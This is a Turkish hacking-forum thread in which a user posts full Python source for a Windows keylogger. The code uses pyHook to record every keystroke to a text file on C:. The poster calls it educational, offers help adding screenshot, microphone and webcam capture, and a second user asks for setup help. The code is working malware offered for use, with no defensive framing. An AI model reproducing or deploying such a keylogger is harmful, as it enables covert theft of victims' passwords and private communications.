Turk Forumlarda Bir İLK Python Keylogger Kaynak Kodu

ostrmain

Yeni üye
1 Eyl 2009
36
0
aradaslar oncelikle herkese calısmasında basarılar diliorum.Tum forumları
arastırdım ancak pythonda yazılmıs bir keylogger bulamadım.sizde goggle dan bakabilirsiniz.
yazdığım keylogger tabi eğitim amaclı olduğu için ufak caplı sadece klavye hareketlerini
gozleyen kodlar içeriyor.ancak bu keylogger işine meraklı arkadaslar python sınıflarında arastırma yaptıklarında goreceklerki
ekran goruntusu alan ,mıcrofondan ses dinleyen,webcamdan goruntu alan kodlar yer alıor.tabi bu kodları uygulamada zorlanırsanız
mesaj atın yardımcı olurum.
nese ben kodlara gecim:

import pyHook
import pythoncom
import sys
class dinlensek:

def __init__(self):
exitKey="4"

adres="C:\kayit.txt" #acılacak txt dosyasının adresi
self.exitKey= exitKey
self.hm = pyHook.HookManager()

self.hm.KeyDown = self.yazVeKaydet #mouse ve klavye olaylarını kaydeder

self.hm.HookKeyboard() #klavye olaylarını izler

self.kayitDefteri = open(adres, 'a') # adresi verilen yerdede kayıt adlı *.txt uzantılı dosya ac

self.asciiSubset = [8,9,10,13,27] #backspace, tab, line feed, carriage return, escape
self.asciiSubset.extend(range(32,128))

pythoncom.PumpMessages()

def yazVeKaydet(self, event):

if event.Ascii in self.asciiSubset:
self.kayitDefteri.write(chr(event.Ascii))

if event.Key ==self.exitKey: #basılan tus 4 ise çık.
sys.exit()

return True
dinlensek()

simdi kodları .py olarak kaydettikten sonra derleyelim.evet keyloggerımız calıstı basılan tusları C:de kayıt.tt içerisinde bulabiliriz.program tarafımdan denenmiştir.bi sorun olursa mesaj atabilirsiniz.herkese ii sabahlar diliorum.

EMEK OLDUĞUNU DUSUNUOSANIZ ++++

Son düzenleme:

balboa53

Yeni üye
13 Şub 2012
2
0
teşekkür güzel paylaşım.ancak pythoncom modülünü bir türlü bulamadım.ve bu komut "pythoncom.PumpMessages() " ne işe yarıyor.bilen varsa yardımlarınızı bekliyorum.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.